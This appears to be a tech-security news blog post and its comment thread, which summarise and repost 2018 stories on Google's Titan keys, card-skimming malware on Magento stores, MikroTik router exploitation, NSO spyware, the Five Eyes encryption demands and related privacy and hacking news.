Joseph Cox / Motherboard:
Google confirms its Titan Security Keys are made by a Chinese company, but says the firmware ensures security, as security experts call for more transparency
Google’s Titan Security Keys, used to lock down accounts, are produced in China. Several experts want more answers on that supply chain process, for fears of tampering or security issues.
Doctors and scientists say microwave strikes may have caused sonic delusions and very real brain damage among embassy staff and family members.
During the Cold War, Washington feared that Moscow was seeking to turn microwave radiation into covert weapons of mind control.
More recently, the American military itself sought to develop microwave arms that could invisibly beam painfully loud booms and even spoken words into people’s heads. The aims were to disable attackers and wage psychological warfare.
Now, doctors and scientists say such unconventional weapons may have caused the baffling symptoms and ailments that, starting in late 2016, hit more than three dozen American diplomats and family members in Cuba and China.
Reuters:
US counter-intelligence chief says China’s spy services are aggressively using fake LinkedIn accounts to target US government workers for recruitment
The United States’ top spy catcher said Chinese espionage agencies are using fake LinkedIn accounts to try to recruit Americans with access to government and commercial secrets, and the company should shut them down.
He said the Chinese campaign includes contacting thousands of LinkedIn members at a time, but he declined to say how many fake accounts U.S. intelligence had discovered, how many Americans may have been contacted and how much success China has had in the recruitment drive.
A rather persistent bug in the takedown code of a major reporting agency has caused an embarrassing situation for several Hollywood studios. For quite some time now, companies including Sony Pictures Television and Columbia Pictures have been inadvertently asking Google to remove the IMDb listings of their own work.
Every single day, largely automated bots scour the web for references to pirated content.
These links are then reported to various online services, such as Google, requesting the operators to remove the allegedly infringing content.
This works fine, most of the time. But, in common with their human counterparts, these bots aren’t perfect.
In a series of bizarre takedown requests, a DMCA takedown outfit is inadvertently going after a wide variety of legitimate sites. Some requests specifically target news about the EU upload filters, or censorship machines, as they are sometimes called. As a result, one article from EU MEP Julia Reda was wiped from Google’s search results.
Linus Torvalds thinks Intel has gotten better about keeping the Linux open-source community in the loop with CPU security problems, but it started out really badly. And it’s still not fair that Linux has to fix hardware problems.
At The Linux Foundation’s Open Source Summit North America in Vancouver, Linus Torvalds, Linux’s creator, and Dirk Hohndel, VMware VP and chief open source officer, had a wide-ranging conversation about Linux security, open-source development, and quantum computing.
Torvalds would really like his work to get back to being boring. It hasn’t been lately because of Intel’s CPU Meltdown and Spectre security bugs. The root cause behind these security holes was speculative execution.
In speculative execution, when a program does a calculation, which might go several ways, the processor assumes several results and works on them. If it’s wrong, it goes back to the beginning and restarts with the correct data. Because CPUs are so fast these days, it’s much quicker to do this than to have the hardware sit idle waiting for data.
Torvalds “loves speculative execution. CPUs must do this.” But, Torvalds is annoyed that “people didn’t think about the problems of taking shortcuts with speculative execution. We knew speculative work that wasn’t used had to be thrown away.” It wasn’t. That problem is now baked in most modern processors. The long-term fix is a new generation of Intel CPUs.
At some point this fall, a team of researchers from MIT’s CSAIL and UC Berkeley’s EECS aim to deliver an initial version of an open source, formally verified, secure hardware enclave based on RISC-V architecture called Keystone.
“From a security community perspective, having trustworthy secure enclaves is really important for building secure systems,” said Dawn Song, a professor of computer science at UC Berkeley and founder and CEO of Oasis Labs, in a phone interview with The Register. “You can say it’s one of the holy grails in computer security.”
Keystone is an open-source project for building trusted execution environments (TEE) with secure hardware enclaves, based on the RISC-V architecture. Our goal is to build a secure and trustworthy open-source secure hardware enclave, accessible to everyone in industry and academia.
SMBs faced an average of five breaches in the last year – but employees feel their companies are covering these up
Almost one in four IT decision makers in small and medium-sized businesses (SMBs) across the UK believe successful cyber attacks are being covered up by their own companies – a problem, given that under GDPR such attacks should be reported.
Trust is even worse in companies with between 50 and 99 employees in particular: just over half of IT leaders (51%) feel their companies have kept secret at least one successful cyber attack in the last 12 months.
According to research commissioned by Appstractor Corporation, SMBs in the UK on average faced at least five cyber threats in the last year, with 19% of companies facing as many as ten attacks. This was as many as 20 for 2% of firms, while every respondent said their firm faced at least one cyber attack during this period.
Fewer than half of IT bosses feel their cyber security software has managed to keep up with the complexities of the threats they face – with a third believing this puts their firms at a higher risk than their big business counterparts.
Rebecca Hill / The Register:
Communiqué from Five Eyes nations tells tech industry to make accommodations on encryption, or legislative or enforcement actions may be taken for lawful access — Five Eyes to tech: We have ways of making you comply — The Five Eyes nations have told the tech industry …
The Five Eyes nations have told the tech industry to help spy agencies by creating lawful access solutions to encrypted services – and warned that governments can always legislate if they don’t.
The UK, US, Canada, Australia and New Zealand – which have a long-standing intelligence agreement – met in Australia this week.
In an official communiqué on the confab, they claim that their inability to lawfully access encrypted content risks undermining democratic justice systems – and issue a veiled warning to industry.
The group is careful to avoid previous criticisms about their desire for backdoors and so-called magic thinking – saying that they have “no interest or intention to weaken encryption mechanisms” – and emphasise the importance of privacy laws.
“Privacy laws must prevent arbitrary or unlawful interference, but privacy is not absolute,” the document stated.
The problem the Five Eyes have is that the principles that allow government agencies to search homes or personal effects don’t give them the ability to use the content of encrypted data.
The principles set out in the Five Eyes’ statement seek to stress that law enforcement’s inability to access the content of “lawfully obtained data” is the responsibility of everyone.
“Law enforcement agencies in our countries need technology providers to assist with the execution of lawful orders,” the group said.
Philips evaluated one of its products and discovered that it was vulnerable to nine different security bugs, one of them of critical severity.
An advisory from the Industrial Control Systems Cyber Emergency Response Team (ICS-CERT) on Thursday describes the vulnerabilities in the Philips e-Alert Unit, warning that the device is exploitable remotely if exposed to the internet, or from the local network.
The horde of security flaws affects versions R2.1 and earlier of the product. Their severity ratings range from medium, for exposing information about the operating system and software components, to critical, for hardcoded credentials.
The e-Alert Unit from Philips is a solution that monitors the performance of medical imaging systems. It is not a medical device in itself but it alerts when key parameters on MRI machines are amiss.
This week a new CryptoJoker ransomware variant called CryptoNar was discovered that has already infected victims. The good news is that a free decryptor was quickly released so that these victims can get their files back for free.
A Dutch security researcher has lifted the veil on a massive website hacking campaign that has infected 7,339 Magento stores with a script that collects payment card data from people shopping on the sites.
The script is what industry experts call a “payment card scraper” or “skimmer.” Hackers breach sites and modify their source code to load the script along with its legitimate files.
The script usually loads on store checkout pages and secretly records payment card details entered in payment forms, data that it later sends to a server under the hacker’s control.
MagentoCore — the most fertile payment skimmer to date
According to de Groot, this is “the most successful to date.”
The researcher says he found the script — which he named MagentoCore — on 7,339 Magento stores in the past six months.
“The average recovery time is a few weeks, but at least 1450 stores have hosted the MagentoCore.net parasite during the full past 6 months,” de Groot says. “New brands are hijacked at a pace of 50 to 60 stores per day.”
A quick PublicWWW search reveals that the MagentoCore script can still be found on 5,172 domains today, at the time of writing.
MagentoCore operated by one of the three MageCart groups
In new spear-phishing campaigns observed this month, the Cobalt hacking group targeted banks in Russia and Romania with emails containing two payloads pointing to two different command and control servers.
Cobalt is a cybercrime gang that has operated since at least 2016, specializing in targeting financial organizations. According to data from Europol, the group is tied to cyberattacks against at least 100 banks across the world, stealing about one billion euros from them.
Although the alleged ringleader has been arrested in Spain this year, and three individuals believed to be members of the hacking crew have been charged at the beginning of the month, the group continues to operate.
Phishing email uses domain similar to financial organization
New York Times:
In lawsuits against Israeli hacking tools maker NSO Group, which claims to not spy with its tools, court docs allegedly show it snooping on calls to close sales
The rulers of the United Arab Emirates had been using Israeli spyware for more than a year, secretly turning the smartphones of dissidents at home or rivals abroad into surveillance devices.
So when top Emirati officials were offered a pricey update of the spying technology, they wanted to make sure it worked, according to leaked emails submitted Thursday in two lawsuits against the spyware’s maker, the Israel-based NSO Group.
Could the company secretly record the phones of the emir of Qatar, a regional rival, the Emiratis asked? How about the phone of a powerful Saudi prince who directed the kingdom’s national guard? Or what about recording the phone of the editor of a London-based Arab newspaper?
“Please find two recordings attached,” a company representative wrote back four days later, according to the emails.
The NSO Group’s actions are now at the heart of the twin lawsuits accusing the company of actively participating in illegal spying — part of a global effort to confront the growing arms race in the world of spyware.
As private companies develop and sell cutting-edge surveillance technology to governments for tens of millions of dollars, human rights groups say the scant oversight over the practice invites rampant misuse.
A pact of five nation states dedicated to a global “collect it all” surveillance mission has issued a memo calling on their governments to demand tech companies build backdoor access to their users’ encrypted data — or face measures to force companies to comply
A 20-year-old from Vancouver, Washington was indicted last week on federal hacking charges and for allegedly operating the “Satori” botnet, a malware strain unleashed last year that infected hundreds of thousands of wireless routers and other “Internet of Things” (IoT) devices. This outcome is hardly surprising given that the accused’s alleged alter ego has been relentless in seeking media attention for this global crime machine.
“Despite the havoc he supposedly wreaked, the accused hacker doesn’t seem to have been terribly knowledgeable about hacking,” Poulsen notes.
Schuchman reportedly went by the handle “Nexus Zeta,” the nickname used by a fairly inexperienced and clumsy ne’er-do-well who has tried on multiple occasions to get KrebsOnSecurity to write about the Satori botnet. In January 2018, Nexus Zeta changed the login page of the botnet control panel he used to remotely control his hacked routers to include a friendly backhanded reference to this author.
Nexus Zeta clearly had limited hacking skills initially and almost no operational security. Indeed, his efforts to gain notoriety for his illegal hacking activities eventually earned him just that, as it usually does.
Last July, in Google’s Sunnyvale offices, a hacker found a way to trick doors into opening without the requisite RFID keycard. Luckily for Google, it was David Tomaschik, an employee at the tech giant, who only had good intentions.
When he sent his malicious code across the Google network, he saw the lights turn from red to green on the door to his office. Then came the satisfying thunk as the lock opened. It was the culmination of work in which Tomaschik had uncovered vulnerabilities in technology made by Software House, the creator of the office controllers managing the physical security of the California site.
Last summer, when Tomaschik looked at the encrypted messages the Software House devices (called iStar Ultra and IP-ACM) were sending across the Google network, he discovered they were non-random; encrypted messages should always look random if they’re properly protected. He was intrigued and digging deeper discovered a “hardcoded” encryption key was used by all Software House devices. That meant he could effectively replicate the key and forge commands, such as those asking a door to unlock. Or he could simply replay legitimate unlocking commands, which had much the same effect.
Tomaschik also discovered he could do all this without any record of his actions. And he could prevent legitimate Google employees from opening doors. “Once I had my findings it became a priority. It was pretty bad,” he told Forbes. Google then moved quickly to prevent attacks on its offices, according to Tomaschik.
A flight from Oakland to Maui was delayed about 90 minutes because of a fake crime-scene photo. And because that apparently wasn’t enough airplane drama for one morning, the crew had to declare an emergency while airborne because pepper spray filled the cabin.
Hawaiian Airlines Flight 23 was originally set to take off Friday morning and was already taxiing when multiple passengers alerted the crew that they had received a horrifying photo of what appeared to be a dead child facedown in a crime scene with numerical markers.
At least 15 passengers were sent the gruesome photo
It turned out that the photo came from a 15-year-old girl who was trying to send an image from her high school medical-biology class to her mother, who was sitting next to her, but accidentally AirDropped the photo to the other passengers around her. AirDrop allows the instant transfer of files among supported Apple devices, like iPhones and iPads, as long as the option is turned on. The “dead” child in the image was actually a mannequin.
“She was telling her mom about the class, and her mom supposedly just got a new iPhone,” Kelly said. “People were a little alarmed by it.”
The girl and her mother were not allowed to continue on the flight and were rebooked on a flight Saturday, Kelly said. They were questioned by officers from the Alameda County Sheriff’s Office, who determined that there was no actual crime.
Cybercriminals Have Been Experimenting With a Blockchain Domain Name System (DNS)
The takedowns of AlphaBay and Hansa in 2017 by law enforcement gave rise to much speculation about the future of dark web marketplaces. As I’ve discussed before, an environment of fear and mistrust is driving the cybercriminal community to incorporate alternative technologies to improve security and remain below the radar as they conduct illicit business online. One such technology is blockchain.
When most people hear the term “blockchain” they typically think of cryptocurrencies and other applications where transactions and interactions among a community of users must be executed with a high degree of trust, efficiency and transparency. However, if we consider the recent challenges that administrators of online criminal forums have encountered, it only makes sense that they would explore applications for blockchain. To that end, some have been experimenting with a blockchain domain name system (DNS) as a way of hiding their malicious activity and bullet-proofing their offerings.
A blockchain DNS is different from a traditional DNS. Typically, when we type a website into an Internet browser, a computer will query a DNS server for an IP address. Essentially, this is the Internet equivalent of a phone book.
Decentralized DNS offers many benefits such as countering censorship by authorities (for example if a government orders all Internet Service Providers in a country to stop redirecting domains to a relevant IP address), or preventing DNS spoofing, where attackers can insert corrupt DNS data so that the name server returns an incorrect IP address and redirects traffic to an attacker computer. However, decentralized DNS can also be abused by attackers for malicious purposes. As blockchain domains do not have a central authority and registrations contain unique encrypted hashes rather than an individual’s name and address, it is harder for law enforcement to perform site takedowns. The following are just a few examples of bad actors using blockchain.
Back in January 2016, one of the first groups to employ blockchain DNS to create a .bazar domain in an attempt to better secure their operations was a group known as The Money Team. In July 2017, the Joker’s Stash, a popular Automated Vending Cart (AVC) site used to purchase stolen payment card details, began using blockchain DNS alongside its established Tor (.onion) domain.
Blockchain technology has also allowed users to realize alternative models for online marketplaces. The site known as Tralfamadore, for example, uses blockchain as its back-end to store the necessary databases and code to support front-end user interfaces.
As cybersecurity professionals, we should continue to monitor for an uptick in the adoption of blockchain for the buying and selling of illicit goods. And while we’re at it, we should also continue to assess other emerging technologies that could be used for nefarious purposes.
A critical remote code execution vulnerability was recently addressed in packagist.org, a large PHP package repository, a security researcher reveals.
An open source project, Packagist is the default package server behind Composer, a tool for dependency management in PHP, as it aggregates public PHP packages installable with the utility. The packagist.org site helps users search for packages and lets Composer know where to get the code from.
A recent case filed in federal court, in which an American woman had her iPhone seized and cracked by Customs and Border Protection in a New Jersey airport puts a whole new spin on the things we now need to worry about when leaving the country. It appears that now everyone’s phones, despite country of origin or cause, are subject to nonconsensual seizure and search — even if we refuse to give up our passwords.
If you’re not caught up on the story, news hit this week that a Staten Island mom coming home from a February trip with her 9-year-old daughter from Switzerland had her iPhone snatched, kept for months and accessed for no given reason.
Cryptojacking, the hijacking of computing resources to mine cryptocurrency, turns out to be both relatively widespread and not particularly profitable, according to a paper published by code boffins from Braunschweig University of Technology in Germany.
In a paper distributed via ArXiv, researchers Marius Musch, Christian Wressnegger, Martin Johns, and Konrad Rieck analyzed the prevalence of cryptomining on websites and found that 1 out of every 500 of the top million Alexa-ranked sites hosts cryptojacking code.
Where cryptocurrencies like Bitcoin depend on CPU cycles for solving the computational puzzles that generate currency, cryptocurrencies like Monero, Bytecoin, and Electroneum rely on memory resources. Commodity hardware can’t compete with GPUs and ASICs in the computation of Bitcoin hashes, but it can help churn out memory-bound calculations.
Google’s new $50 Titan Security Key adds extra security to your account, and helps protect Facebook, Dropbox and other services, too, as long as you don’t lose it. CNBC’s Todd Haselton puts it to the test.
Google’s new $50 Titan Security Key adds extra security to your account, and helps protect Facebook, Dropbox and other services from phishing attacks… as long as you don’t lose it.
“We have had no reported or confirmed account takeovers since implementing security keys at Google,” a spokesperson told TechCrunch.
And it’s probably true. Think of a security key as being like a two-factor authentication code that’s sent to your phone — except that it is a USB stick in your pocket. Two-factor authentication is stronger than just a username and password, but text message codes can be intercepted and many sites and services don’t yet support the stronger authenticator codes.
Google on Thursday began selling a new piece of hardware called the Titan security key, which is designed to add another layer of protection for online security. But the company has faced criticism for producing the key in China through a partnership with manufacturer Feitian, according to a report from CNBC.
The product is labeled as being “Produced in China,” meaning, like many consumer electronics, that the security key is manufactured there. Some security experts, such as Adam Meyers at the security firm CrowdStrike, who was interviewed by The Information, say that having production overseas leaves Google open to infiltration by hackers or even the Chinese government during the assembly process.
Internet-connected 3D printers are at risk of being tampered with or even sabotaged because users fail to apply security controls, a researcher has warned.
Xavier Mertens, a senior handler for the SANS Internet Storm Center (ISC) and freelance cybersecurity consultant, found more than 3,700 3D printers directly connected to the internet.
“These printers are controlled using the open source software package ‘OctoPrint’ but it’s likely there are other tools that are similarly affected. OctoPrint is not meant to be exposed in this way, and it explains in its documentation how to deploy the software in a safe way,” Mertens explained.
Many OctoPrint instances are not properly configured and do not enforce authentication, so an attacker would be able to download the files that describe parts being printed.
An attacker would also be able to swap out these files, replacing them with files that describe similar parts that are “weakened” to produce substandard or unsafe parts.
The problem here is users going out of their way to expose internal services on the public net.
“There’s no way to prevent people from exposing internal services on the net. I try to educate, I’m working on yet another prominent warning, but I can’t force people to perform proper (and inconvenient) network security.”
Some printers do not have safety switches to prevent them from overheating, which means an attacker could attempt to start a fire by uploading a malicious file.
Each RouterBOARD device runs the RouterOS software system.[1]
According to WikiLeaks, the CIA Vault7 hacking tool Chimay Red involves two exploits: Winbox Any Directory File Read (CVE-2018-14847) and a Webfig Remote Code Execution Vulnerability.[2]
Both Winbox and Webfig are RouterOS management components.
Since Mid-July, our Anglerfish Honeypot System has been picking up malware exploiting the above MikroTik CVE-2018-14847 vulnerability to perform various malicious activities.
What’s more, we have observed a massive number of victims having the Socks4 proxy enabled on their device by one single malicious actor.
More interestingly, we also discovered that more than 7,500 victims are being actively eavesdropped on, with their traffic being forwarded to IPs controlled by unknown attackers.
Vulnerable Devices
From our own scan results, we logged more than 5,000K devices with TCP port 8291 open; 1,200K of them were identified as MikroTik devices, of which 370K (30.83%) are vulnerable to CVE-2018-14847.
The Attacks
CoinHive Mining Code Injection
Socks4 Proxy and the Mysterious 95.154.216.128/25
Eavesdropping
Suggestions
We recommend that MikroTik RouterOS users update the software system in a timely manner, and check whether the http proxy, Socks4 proxy and network traffic capture function are being maliciously exploited by attackers.
Copyright owners will need more if they want a successful legal case
Why it matters: Judge rules that copyright trolls need more than just an IP address if they want to go after copyright infringement. An IP is not enough proof to tie a person to a crime.
Wall Street Journal:
Wall Street Journal survey: after the Atlanta ransomware attack, a majority of the 25 largest US cities have or are looking to buy cybersecurity insurance
Researchers at Lancaster University have used an active acoustic side-channel attack to steal smartphone passwords for the first time.
On Thursday, a group of researchers from Lancaster University posted a paper to arXiv that demonstrates how they used a smartphone’s microphone and speaker system to steal the device’s unlock pattern.
Although the average person doesn’t have to worry about getting hacked this way any time soon, the researchers are the first to demonstrate that this kind of attack is even possible. According to the researchers, their “SonarSnoop” attack decreases the number of unlock patterns an attacker must try by 70 percent and can be performed without the victim ever knowing they’re being hacked.
SonarSnoop exploits secondary information that will also reveal the password—in this case, the acoustic signature from entering the password on the device.
“SonarSnoop is applicable in any environment where microphones and speakers can interact.”
The attack begins when a user unwittingly installs a malicious application on their phone. When a user downloads the infected app, their phone begins broadcasting a sound signal that is just above the human range of hearing. This sound signal is reflected by every object around the phone, creating an echo. This echo is then recorded by the phone’s microphone.
By calculating the time between the emission of the sound and the return of its echo to the source, it is possible to determine the location of an object in a given space and whether that object is moving—this is known as sonar.
A 24-year-old murder suspect was sentenced to 14 months in prison on Friday for refusing to hand over his Facebook account password to detectives who are investigating the death of 13-year-old schoolgirl Lucy McHugh.
Stephen Nicholson, a friend of the family who’d been staying with them, was allegedly in contact with Lucy the morning of her disappearance. Police took him into custody and asked him – twice – for his password so they could check out the alleged conversation and whatever other content might help the investigation.
Nicholson has been jailed not for the murder, but for his refusal to cooperate with the detectives and let them into his account.
On Friday, he pleaded guilty to failing to disclose access codes to an electronic device under the Regulation of Investigatory Powers Act 2000 (RIPA).
According to the Independent, Nicholson argued that giving police access to his private Facebook messages could expose information relating to cannabis.
The judge scoffed, describing the excuse as “wholly inadequate”, considering the severity of the case.
Privacy and human rights organizations expressed concern Tuesday after a coalition of intelligence agencies renewed a call for technology companies to allow so-called “backdoor” access to encrypted content and devices.
The reaction came following a weekend statement from the “Five Eyes” intelligence agencies calling on “industry partners” to provide a way for law enforcement to access encrypted content that may not be available even with a search warrant.
The call by the agencies from the United States, Britain, Canada, Australia and New Zealand threatens to reignite a long-simmering debate on encryption.
Android device details are being exposed to running applications via Wi-Fi broadcasts in the mobile operating system, Nightwatch Cybersecurity has discovered.
The exposed information includes the WiFi network name, BSSID, local IP addresses, DNS server information, and the MAC address. Normally, extra permissions are required to access such details, but Wi-Fi broadcasts allow all applications to capture the information, thus bypassing existing mitigations.
Furthermore, Nightwatch Cybersecurity’s researchers argue that the MAC address, which is tied to the hardware, can be used to “uniquely identify and track any Android device.” Information such as network name and BSSID allow for the geolocation of users, while other information can be leveraged for other attacks.
Tracked as CVE-2018-9489, the vulnerability was addressed in the recently released Android 9, but previous platform iterations continue to be impacted, the security firm says. Thus, all devices running those OS versions, including forks such as Amazon’s FireOS for the Kindle, are believed to be vulnerable.
This year’s mobile-focused Pwn2Own hacking competition organized by Trend Micro’s Zero Day Initiative (ZDI) will include a new category for Internet of Things (IoT) devices.
The event, whose name has been changed from Mobile Pwn2Own to Pwn2Own Tokyo as a result of the expansion, will take place alongside the PacSec security conference in Tokyo, Japan, on November 13 – 14.
Hackers can earn over $500,000 in cash and prizes if they manage to find and exploit vulnerabilities in devices from Google, Apple, Samsung, Huawei, Xiaomi, Amazon and Nest.
In the new IoT category, contestants can earn up to $60,000 if they can execute arbitrary code without user interaction on Apple Watch Series 3, Amazon Echo (2nd generation), Google Home, Nest Cam IQ Indoor and Amazon Cloud Cam devices.
One day late last year, Qatari newspaper editor Abdullah Al-Athbah came home, removed the SIM card from his iPhone 7 and smashed it to pieces with a hammer.
A source had just handed Al-Athbah a cache of emails suggesting that his phone had been targeted by hacking software made by Israel’s NSO Group. He told The Associated Press he considered the phone compromised.
“I feared that someone could get back into it,” he said in an interview Friday. “I needed to protect my sources.”
Google last week took the wraps off Tink, an open source, multi-language, cross-platform cryptographic library designed to help simplify common encryption operations.
Under development for the past two years, the cryptographic library has been available on GitHub since its early days and has already attracted a few external contributors.
Now at version 1.2.0 and with support for cloud, Android, iOS, and more, the library is already being used to secure data of Google products such as AdMob, Google Pay, Google Assistant, Firebase, the Android Search App, and others.
Built on top of existing libraries such as BoringSSL and Java Cryptography Architecture, Tink also includes a series of countermeasures that aim at mitigating weaknesses that Google’s Project Wycheproof discovered in those libraries.
Dutch security researcher Willem de Groot, who’s particularly interested in security problems on online payment sites, recently wrote about a long-running Magento malware campaign.
Magento is to ecommerce what WordPress is to blogging – you can run the open source version on your own servers; you can use an ecommerce partner who’ll run a Magento instance for you; or you can sign up for Magento’s own cloud platform.
Thousands of sites still run their own Magento servers, even in the modern cloud-centric era, for example because they’ve already got a customised warehousing and shipping system with which their ecommerce servers need to integrate.
Unfortunately, de Groot found that many of these sites – more than 7000 in total, he claims – have been infiltrated by cybercrooks in the past six months.
Worse still, de Groot estimates that nearly 1500 of them may have been infected for the entire six-month period.
The Wayback Machine’s archive of webpages is legitimate evidence that may be used in litigation, a US appeals court has decided.
The second circuit ruling [PDF] supports a similar one from the third circuit – and, taken together, the decisions could pave the way for the Internet Archive’s library of webpages to be considered evidence for countless future trials.
The second circuit, based in New York, was asked over the summer to review an appeal by an Italian computer hacker in which he sought to exclude screenshots of websites run by him that tied him to a virus and botnet he was ultimately convicted over. Prosecutors had taken screenshots of his webpages from the Internet Archive and used them as trial evidence – and he wanted the files thrown out.
Fabio Gasperini argued that the presented Wayback Machine archives of his webpages were not adequately authenticated as legit and untampered, and so shouldn’t have been included in his criminal trial.
In the Gasperini case, however, the second circuit noted that the prosecution had included testimony from the Internet Archive’s office manager, “who explained how the Archive captures and preserves evidence of the contents of the internet at a given time.”
The Wayback Machine works by crawling over the web with bots that automatically fetch as many pages as they can find and store it all in a searchable public database, effectively snapshotting the world’s websites on a given day. For instance, if you want to see what The Register looked like in 1998, go right ahead.
The manager also testified that the prosecution’s screenshots of the Wayback Machine’s archive of Gasperini’s webpages really did match the contents of the Internet Archive
493 Comments
Tomi Engdahl says:
Joseph Cox / Motherboard:
Google confirms its Titan Security Keys are made by a Chinese company, but says the firmware ensures security, as security experts call for more transparency
Experts Call for Transparency Around Google’s Chinese-Made Security Keys
https://motherboard.vice.com/en_us/article/mb4zy3/transparency-google-titan-security-keys-china
Google’s Titan Security Keys, used to lock down accounts, are produced in China. Several experts want more answers on that supply chain process, for fears of tampering or security issues.
Tomi Engdahl says:
It seems that tinfoil hat wearing people had some point:
Microwave Weapons Are Prime Suspect in Ills of U.S. Embassy Workers
https://www.nytimes.com/2018/09/01/science/sonic-attack-cuba-microwave.html
Doctors and scientists say microwave strikes may have caused sonic delusions and very real brain damage among embassy staff and family members.
During the Cold War, Washington feared that Moscow was seeking to turn microwave radiation into covert weapons of mind control.
More recently, the American military itself sought to develop microwave arms that could invisibly beam painfully loud booms and even spoken words into people’s heads. The aims were to disable attackers and wage psychological warfare.
Now, doctors and scientists say such unconventional weapons may have caused the baffling symptoms and ailments that, starting in late 2016, hit more than three dozen American diplomats and family members in Cuba and China.
Tomi Engdahl says:
Reuters:
US counter-intelligence chief says China’s spy services are aggressively using fake LinkedIn accounts to target US government workers for recruitment
Exclusive: U.S. accuses China of ‘super aggressive’ spy campaign on LinkedIn
https://www.reuters.com/article/us-linkedin-china-espionage-exclusive/exclusive-chief-u-s-spy-catcher-says-china-using-linkedin-to-recruit-americans-idUSKCN1LG15Y
The United States’ top spy catcher said Chinese espionage agencies are using fake LinkedIn accounts to try to recruit Americans with access to government and commercial secrets, and the company should shut them down.
He said the Chinese campaign includes contacting thousands of LinkedIn members at a time, but he declined to say how many fake accounts U.S. intelligence had discovered, how many Americans may have been contacted and how much success China has had in the recruitment drive.
Tomi Engdahl says:
Vindu Goel / New York Times:
Indian regulators call for European-style rules on big tech, focused on privacy and protecting local firms from competition; sources say new rules are coming
https://www.nytimes.com/2018/08/31/technology/india-technology-american-giants.html
Tomi Engdahl says:
This is Google’s Titan security key
https://techcrunch.com/2018/08/30/this-is-googles-titan-security-key/
Tomi Engdahl says:
Hollywood Studios Flag Their IMDb Listings as “Pirate” Links
https://torrentfreak.com/hollywood-studios-flag-their-imdb-listings-as-pirate-links-180818/
A rather persistent bug in the takedown code of a major reporting agency has caused an embarrassing situation for several Hollywood studios. For quite some time now, companies including Sony Pictures Television and Columbia Pictures have been inadvertently asking Google to remove the IMDb listings of their own work.
Every single day, largely automated bots scour the web for references to pirated content.
These links are then reported to various online services, such as Google, requesting the operators to remove the allegedly infringing content.
This works fine, most of the time. But, in common with their human counterparts, these bots aren’t perfect.
None of these takedown tools are perfect.
Tomi Engdahl says:
Bizarre DMCA Takedown Requests Censor EU ‘Censorship’ News
By Ernesto on August 11, 2018
https://torrentfreak.com/bizarre-dmca-takedown-requests-censor-eu-censorship-news-181011/
In a series of bizarre takedown requests, a DMCA takedown outfit is inadvertently going after a wide variety of legitimate sites. Some requests specifically target news about the EU upload filters, or censorship machines, as they are sometimes called. As a result, one article from EU MEP Julia Reda was wiped from Google’s search results.
Tomi Engdahl says:
Linus Torvalds talks frankly about Intel security bugs
https://www.zdnet.com/article/linus-torvalds-talks-frankly-about-intel-security-bugs/
Linus Torvalds thinks Intel has gotten better about keeping the Linux open-source community in the loop with CPU security problems, but it started out really badly. And it’s still not fair that Linux has to fix hardware problems.
At The Linux Foundation’s Open Source Summit North America in Vancouver, Linus Torvalds, Linux’s creator, and Dirk Hohndel, VMware VP and chief open source officer, had a wide-ranging conversation about Linux security, open-source development, and quantum computing.
Torvalds would really like his work to get back to being boring. It hasn’t been lately because of Intel’s CPU Meltdown and Spectre security bugs. The root cause behind these security holes was speculative execution.
In speculative execution, when a program does a calculation, which might go several ways, the processor assumes several results and works on them. If it’s wrong, it goes back to the beginning and restarts with the correct data. Because CPUs are so fast these days, it’s much quicker to do this than to have the hardware sit idle waiting for data.
Torvalds “loves speculative execution. CPUs must do this.” But, Torvalds is annoyed that “people didn’t think about the problems of taking shortcuts with speculative execution. We knew speculative work that wasn’t used had to be thrown away.” It wasn’t. That problem is now baked in most modern processors. The long-term fix is a new generation of Intel CPUs.
Tomi Engdahl says:
Boffins trying to build an open source secure enclave on RISC-V
Open source trusted execution component expected this fall
https://www.theregister.co.uk/2018/08/31/keystone_secure_enclave/
At some point this fall, a team of researchers from MIT’s CSAIL and UC Berkeley’s EECS aim to deliver an initial version of an open source, formally verified, secure hardware enclave based on RISC-V architecture called Keystone.
“From a security community perspective, having trustworthy secure enclaves is really important for building secure systems,” said Dawn Song, a professor of computer science at UC Berkeley and founder and CEO of Oasis Labs, in a phone interview with The Register. “You can say it’s one of the holy grails in computer security.”
Keystone
Open-source Secure Hardware Enclave
https://keystone-enclave.org/
Keystone is an open-source project for building trusted execution environments (TEE) with secure hardware enclaves, based on the RISC-V architecture. Our goal is to build a secure and trustworthy open-source secure hardware enclave, accessible to everyone in industry and academia.
Tomi Engdahl says:
IT staff believe their own companies are keeping cyber attacks secret
http://www.itpro.co.uk/security/31815/it-staff-believe-their-own-companies-are-keeping-cyber-attacks-secret
SMBs faced an average of five breaches in the last year – but employees feel their companies are covering these up
Almost one in four IT decision makers in small and medium-sized businesses (SMBs) across the UK believe successful cyber attacks are being covered-up by their own companies – a problem given under GDPR they should be reported.
Trust is even worse in companies numbering between 50 and 99 employees in particular, as just over half of IT leaders, 51%, feel their companies have kept secret at least one successful cyber attack in the last 12 months.
According to research commissioned by Appstractor Corporation, SMBs in the UK on average faced at least five cyber threats in the last year, with 19% of companies facing as many as ten attacks. This was as many as 20 for 2% of firms, while every respondent said their firm faced at least one cyber attack during this period.
Fewer than half of IT bosses, feel their cyber security software has managed to keep up with the complexities of the threats they face – with a third of believing this puts their firms at a higher risk than big business counterparts.
https://www.appstractor.com/privatise/small-business-cyber-security-statistics
Tomi Engdahl says:
CCleaner update offers improved privacy controls, renames elements to stop users freaking out, adds bundleware
https://betanews.com/2018/08/30/ccleaner-improved-privacy/
Tomi Engdahl says:
http://www.cloudtacker.com/content/cisco-7-password-decryptor-deobfuscator-decoder
Tomi Engdahl says:
Rebecca Hill / The Register:
Communiqué from Five Eyes nations tells tech industry to make accommodations on encryption, or legislative or enforcement actions may be taken for lawful access — Five Eyes to tech: We have ways of making you comply — The Five Eyes nations have told the tech industry …
Spies still butthurt they can’t get at encrypted comms data
Five Eyes to tech: We have ways of making you comply
https://www.theregister.co.uk/2018/08/31/five_eyes_2018_meeting_encryption_terrorist_content/
The Five Eyes nations have told the tech industry to help spy agencies by creating lawful access solutions to encrypted services – and warned that governments can always legislate if they don’t.
The UK, US, Canada, Australia and New Zealand – which have a long-standing intelligence agreement – met in Australia this week.
In an official communiqué on the confab, they claim that their inability to lawfully access encrypted content risks undermining democratic justice systems – and issue a veiled warning to industry.
The group is careful to avoid previous criticisms about their desire for backdoors and so-called magic thinking – saying that they have “no interest or intention to weaken encryption mechanisms” – and emphasise the importance of privacy laws.
“Privacy laws must prevent arbitrary or unlawful interference, but privacy is not absolute,” the document stated.
The problem the Five Eyes have is that the principles that allow government agencies to search homes or personal effects don’t give them the ability to use the content of encrypted data.
The principles set out in the Five Eyes’ statement seek to stress that law enforcement’s inability to access the content of “lawfully obtained data” is the responsibility of everyone.
